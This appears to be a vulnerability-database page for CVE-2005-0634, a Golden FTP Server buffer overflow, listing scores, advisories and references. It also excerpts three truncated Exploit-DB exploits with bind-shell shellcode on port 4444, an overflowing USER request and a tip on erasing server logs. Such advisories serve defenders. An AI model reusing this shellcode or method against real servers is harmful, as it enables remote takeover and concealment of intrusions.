CVE-2005-0634
Published 2005-05-02
CVE-2005-0634: Buffer overflow in Golden FTP Server 1.92 allows remote attackers to execute arbitrary code via a long USER command.
Priority: P3 · 43 · high · 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 10.21% (95.1th percentile)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| goldenftpserver | golden_ftp_server | — | — |
| kmint21_software | golden_ftp_server | — | — |
GHSA
GHSA-vvm3-r83f-jhgf: Heap-based buffer overflow in Golden FTP Server (goldenftpd) 1
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2006-6576 [HIGH] CWE-787 GHSA-vvm3-r83f-jhgf: Heap-based buffer overflow in Golden FTP Server (goldenftpd) 1
Heap-based buffer overflow in Golden FTP Server (goldenftpd) 1.92 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long PASS command. NOTE: it was later reported that 4.70 is also affected. NOTE: the USER vector is already covered by CVE-2005-0634.
GHSA
GHSA-235q-j3xw-c5jw: Buffer overflow in Golden FTP Server 1
ghsa_unreviewed·2022-05-01
CVE-2005-0634 [HIGH] GHSA-235q-j3xw-c5jw: Buffer overflow in Golden FTP Server 1
Buffer overflow in Golden FTP Server 1.92 allows remote attackers to execute arbitrary code via a long USER command.
No detection rules found.
Exploit-DB
Golden FTP Server Pro 2.52 - Remote Buffer Overflow (3)
exploitdb·2005-04-29
CVE-2005-0634 Golden FTP Server Pro 2.52 - Remote Buffer Overflow (3)
---
/*
\ golden ftp 2.52.0.0 remote r00t exploit
/
\ remote r00t exploit binds 4444 port on remote machine.
/ tested on: winxp sp0 rus
\
/ simple stack overflow in golden ftpd.
\ if retaddr isn't right, ftpd will crash, and admin will be in big shit
/ 'coz ftpd won't start later ;)
\
/ code to be executed, admin must restart or shutdown ftpd... then ftpd will execute eviLDuDe'Z c0de )
\
/ gr33tz: choix, nekd0, xtix, crash-x, coki, rave, antiq, xoce, shi, 'em, lp, spekterX, edisan, c0wboy
\ ilja, esDee, blackhatz.inf0, sk3w
/ p.s }:+ EvILduDe
\ (c) uKt research '04/'05
*/
#include
#include
#include
#include
#include
#define RETADDR 0x77F510B0
char shellcode[]= // binds 4444 port
"\xd9\xEE\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x7
Exploit-DB
Golden FTP Server Pro 2.52 - Remote Buffer Overflow (1)
exploitdb·2005-04-29
CVE-2005-0634 Golden FTP Server Pro 2.52 - Remote Buffer Overflow (1)
---
/*
*
* Golden FTP Server Pro Remote Buffer Overflow Exploit
* Bug Discovered by Reed Arvin (http://reedarvin.thearvins.com)
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: [email protected]
* Credit to kozan and metasploit
* Usage:exploit
*
*/
/*
*
* Vulnerable Versions:
* Golden FTP Server Pro v2.52
*
* Exploit:
* Run the exploit against the server. Afterward, right
* click on the Golden FTP Server Pro icon in the Windows tray and click
* Statistic.
* It will open bind shell on port 4444
*
*/
#include
#include
#pragma comment(lib, "ws2_32.lib")
char userreq[] =
"USER "
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Exploit-DB
Golden FTP Server Pro 2.52 - Remote Buffer Overflow (2)
exploitdb·2005-04-29
CVE-2005-0634 Golden FTP Server Pro 2.52 - Remote Buffer Overflow (2)
---
/*
Golden FTP Server Pro remote stack BOF exploit
author : c0d3r "kaveh razavi" [email protected] [email protected]
risk : highly critical
vendor status : no patch released , all targets are vuln
package : golden-ftp-server-pro 2.5.0.0 and prior
advisory : http://secunia.com/advisories/15156/
vendor address : www.goldenftpserver.com
timeline :
28 Apr 2005 : Public Disclosure
29 Apr 2005 : IHS exploit released , winxpsp1 & winxpsp2 target
after running the exploit u need to restart the server after that
the server will be closed automatically then u will have a shell
on port 4444 . if u want to erase the crap just clean the GFTPpro.log
manually as mentioned in the advisory .
workaround : upgrade to newer version or use anothe
No writeups or analysis indexed.
http://retrogod.altervista.org/golden_heap.html
http://secunia.com/advisories/23323
http://www.securityfocus.com/archive/1/391987
http://www.securityfocus.com/bid/12704
http://www.vupen.com/english/advisories/2006/4936
Published: 2005-05-02